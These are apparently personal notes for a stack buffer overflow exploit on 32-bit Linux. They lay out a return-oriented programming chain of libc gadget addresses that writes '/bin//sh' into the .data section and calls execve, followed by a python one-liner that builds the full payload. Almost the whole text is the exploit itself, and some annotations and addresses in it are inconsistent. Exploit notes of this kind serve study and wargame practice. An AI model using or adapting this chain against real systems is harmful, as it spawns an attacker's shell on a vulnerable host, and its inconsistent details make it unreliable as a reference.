0x08049f28 - 0x08049ff0 is .dynamic
0x0804a010 - 0x0804a018 is .data

"A"*264
+ 0xb7e4404f	pop eax ;ret
+ "/bin"	nib/
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a00c	substracted 4 from address as per requirement by gadget
		address(+4) to write "/bin" to(i.e. 0xbffff230)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e4404f	pop eax ;ret
+ "//sh"	
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a010	substracted 4 from address as per requirement by gadget
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e9e59f	xor eax eax ; ret ;;
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a014	address(+4) to write NULL bytes to.(i.e. 0x0804a020)(now 0xbffff0d8)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7f1da81	pop edx ; pop ecx ; pop ebx ;ret
+ 0x0804a018
+ 0x0804a018
+ 0x0804a010	pointer of string "/bin//sh"
+ 0xb7f693e6	add eax 0xb ;ret
+ 0xb7ed9c25	call dword [gs:0x10] ;ret


`python -c 'print "A"*264+"\x4f\x40\xe4\xb7"+"nib/"+"\x9e\x1a\xe2\xb7"+"\x0c\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"hs//"+"\x9e\x1a\xe2\xb7"+"\x10\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x9f\xe5\xe9\xb7"+"\x9e\x1a\xe2\xb7"+"\x14\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x81\xda\xf1\xb7"+"\x18\xa0\x04\x08"+"\x18\xa0\x04\x08"+"\x10\xa0\x04\x08"+"\xe6\x93\xf6\xb7"+"\xb0\xf1\xfd\xb7"'`
